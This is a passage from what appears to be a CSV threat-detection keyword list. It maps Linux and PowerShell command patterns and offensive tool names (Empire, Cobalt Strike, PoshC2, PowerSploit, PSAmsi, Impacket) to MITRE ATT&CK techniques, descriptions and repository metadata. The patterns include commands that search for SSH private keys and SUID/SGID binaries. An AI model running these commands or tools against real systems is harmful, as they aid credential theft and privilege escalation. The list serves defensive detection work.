Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*find / -name id_rsa *> /dev/null*,greyware_tool_keyword,find,Find sensitive files,T1083 - T1213.002 - T1005,TA0007 - TA0010,N/A,N/A,discovery,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*find / -name id_rsa 2>*,greyware_tool_keyword,find,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*find / -perm /2000 -ls 2>/dev/null*,greyware_tool_keyword,find,Find SGID enabled files,T1044 - T1083,TA0007 - TA0009,N/A,N/A,Discovery - Privilege Escalation,N/A,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*find / -perm +4000 -type f 2>/dev/null*,greyware_tool_keyword,find,Find SUID enabled files,T1044 - T1083,TA0007 - TA0009,N/A,N/A,Discovery - Privilege Escalation,N/A,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*find / -perm +8000 -ls 2>/dev/null*,greyware_tool_keyword,find,Find SGID enabled files,T1044 - T1083,TA0007 - TA0009,N/A,N/A,Discovery - Privilege Escalation,N/A,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*find / -perm -2000,greyware_tool_keyword,find,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.# sticky bits,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*find / -perm -4000,greyware_tool_keyword,find,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.# 
sticky bits,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*find / -perm -4000 -type f *,greyware_tool_keyword,find,Find SUID enabled files,T1044 - T1083,TA0007 - TA0009,N/A,N/A,Discovery - Privilege Escalation,N/A,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*find / -perm -g=s,greyware_tool_keyword,find,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # sticky bits,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*find / -perm -u=s,greyware_tool_keyword,find,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. 
sticky bits,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*find / -perm -u=s -type f 2>/dev/null*,greyware_tool_keyword,find,Find SUID enabled files,T1044 - T1083,TA0007 - TA0009,N/A,N/A,Discovery - Privilege Escalation,N/A,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*find / -perm -u=s -type f -group */dev/null*,greyware_tool_keyword,find,Find SUID enabled files,T1044 - T1083,TA0007 - TA0009,N/A,N/A,Discovery - Privilege Escalation,N/A,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*find / -uid 0 -perm -4000 -type f *,greyware_tool_keyword,find,Find SUID enabled files,T1044 - T1083,TA0007 - TA0009,N/A,N/A,Discovery - Privilege Escalation,N/A,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*find / -user root -perm -6000 -type f 2>*,greyware_tool_keyword,find,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*find /* -perm -04000 -o -perm -02000*,greyware_tool_keyword,find,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*find /* -perm -u=s -type f 2>*,greyware_tool_keyword,find,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - 
T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*find_and_load_coerce_methods*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*find_domain.sh *,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,0,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*find_payload(*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/gloxec/CrossC2,1,0,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*Find-4624Logons*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-ComputerDetails.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-4648Logons*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-ComputerDetails.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*FindAdminAccessComputers*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*Find-AdminLogonScripts.ps1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*find-allvulns*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - 
a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Find-AmsiAstSignatures -*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,0,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*Find-AmsiPSTokenSignatures -*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,0,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*Find-AmsiSignatures.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*Find-AppLockerLogs*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-ComputerDetails.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-AVSignature*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*findDelegation.py -dc-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*findDelegation.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*Find-DomainShare -*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-DomainShare -CheckShareAccess*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-Fruit.*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Find-Fruit.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-Fruit.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1108,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*findgpocomputeradmin*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z
-*Find-GPOComputerAdmin*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z
-*Find-GPOComputerAdmin*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z
-*Find-InterestingDomainAcl*,offensive_tool_keyword,AD exploitation cheat sheet,Lateral Movement Enumeration With PowerView,T1595 - T1590 - T1591 - T1213 - T1039 - T1592,N/A,N/A,N/A,Lateral movement,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*Find-InterestingDomainAcl*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z
-*Find-InterestingDomainAcl*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - 